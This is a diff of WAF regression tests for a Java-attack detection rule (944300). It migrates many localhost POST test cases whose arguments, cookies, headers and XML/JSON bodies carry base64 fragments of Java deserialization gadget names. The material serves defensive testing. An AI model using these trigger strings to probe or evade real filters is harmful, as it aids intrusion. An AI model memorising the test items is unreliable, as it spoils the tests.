"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gludm9rZXJ0cmFuc2Zvcm1lcg - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gludm9rZXJ0cmFuc2Zvcm1lcg + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 215 desc: "XML attribute value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 216 desc: "XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 217 desc: "Nested XML element value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 218 desc: "Content-Type text/plain includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - test_title: 944300-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gludm9rZXJ0cmFuc2Zvcm1lcg" + output: + log: + expect_ids: [944300] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Gludm9rZXJ0cmFuc2Zvcm1lcg\"}" + output: + log: + expect_ids: [944300] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword Gludm9rZXJ0cmFuc2Zvcm1lcg" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Gludm9rZXJ0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 221 desc: "Argument test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 222 desc: "Argument name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI=test" + output: + log: + expect_ids: [944300] + - test_id: 223 desc: "Cookie test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 224 desc: "Cookie name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnZva2VydHJhbnNmb3JtZXI=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 225 desc: "Request header test includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BpbnZva2VydHJhbnNmb3JtZXI - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnZva2VydHJhbnNmb3JtZXI + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 226 desc: "XML attribute value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 227 desc: "XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 228 desc: "Nested XML element value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 229 desc: "Content-Type text/plain includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BpbnZva2VydHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - test_title: 944300-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BpbnZva2VydHJhbnNmb3JtZXI" + output: + log: + expect_ids: [944300] + - test_id: 230 desc: "Content-Type application/json arg value includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnZva2VydHJhbnNmb3JtZXI\"}" + output: + log: + expect_ids: [944300] + - test_id: 231 desc: "Content-Type application/json arg name includes keyword BpbnZva2VydHJhbnNmb3JtZXI" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BpbnZva2VydHJhbnNmb3JtZXI\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 232 desc: "Argument test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 233 desc: "Argument name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5=test" + output: + log: + expect_ids: [944300] + - test_id: 234 desc: "Cookie test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 235 desc: "Cookie name includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlY2xvbmVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 236 desc: "Request header test includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlY2xvbmVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 237 desc: "XML attribute value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 238 desc: "XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 239 desc: "Nested XML element value includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlY2xvbmVmYWN0b3J5" + output: + log: + expect_ids: [944300] + - test_id: 240 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlY2xvbmVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 